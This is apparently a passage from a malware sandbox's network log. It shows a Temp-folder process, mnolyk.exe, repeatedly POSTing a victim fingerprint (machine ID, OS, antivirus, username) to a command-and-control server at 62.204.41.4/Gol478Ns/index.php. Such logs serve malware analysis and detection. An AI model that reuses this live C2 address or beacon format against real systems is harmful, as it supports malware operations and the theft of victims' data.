250	192.168.2.5	49960	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:15.604284048 CET	469	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:15.666282892 CET	469	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
251	192.168.2.5	49961	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:15.841480017 CET	470	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:15.906101942 CET	470	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
252	192.168.2.5	49962	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:16.087938070 CET	471	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:16.154189110 CET	471	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
253	192.168.2.5	49963	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:16.325114965 CET	472	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:16.389321089 CET	472	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
254	192.168.2.5	49964	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:16.564708948 CET	473	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:16.628155947 CET	473	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
255	192.168.2.5	49965	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:16.796474934 CET	474	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:16.859021902 CET	474	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
256	192.168.2.5	49966	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:17.026384115 CET	475	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:17.091063976 CET	475	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
257	192.168.2.5	49967	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:17.264760971 CET	476	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:17.328480959 CET	476	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
258	192.168.2.5	49968	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:17.511976957 CET	477	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:17.574965000 CET	477	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
259	192.168.2.5	49969	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:17.745574951 CET	478	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:17.808662891 CET	478	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49726	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:12.281502008 CET	154	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:12.344497919 CET	154	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
260	192.168.2.5	49970	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:17.986268044 CET	479	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:18.050436974 CET	480	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
261	192.168.2.5	49971	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:18.215583086 CET	480	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:18.277318001 CET	481	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
262	192.168.2.5	49972	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:18.490991116 CET	481	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:18.554172039 CET	482	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
263	192.168.2.5	49973	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:18.734051943 CET	482	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:18.796974897 CET	483	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
264	192.168.2.5	49974	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:18.969300985 CET	483	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:19.034096956 CET	484	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
265	192.168.2.5	49975	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:19.199652910 CET	484	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:19.264226913 CET	485	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
266	192.168.2.5	49976	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:19.455951929 CET	485	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:19.521222115 CET	486	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
267	192.168.2.5	49977	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:19.705615997 CET	486	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:19.770293951 CET	487	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
268	192.168.2.5	49978	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:19.951025963 CET	487	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:20.015084982 CET	488	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
269	192.168.2.5	49979	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:20.181958914 CET	488	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:20.245548010 CET	489	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49727	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:12.532927990 CET	155	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
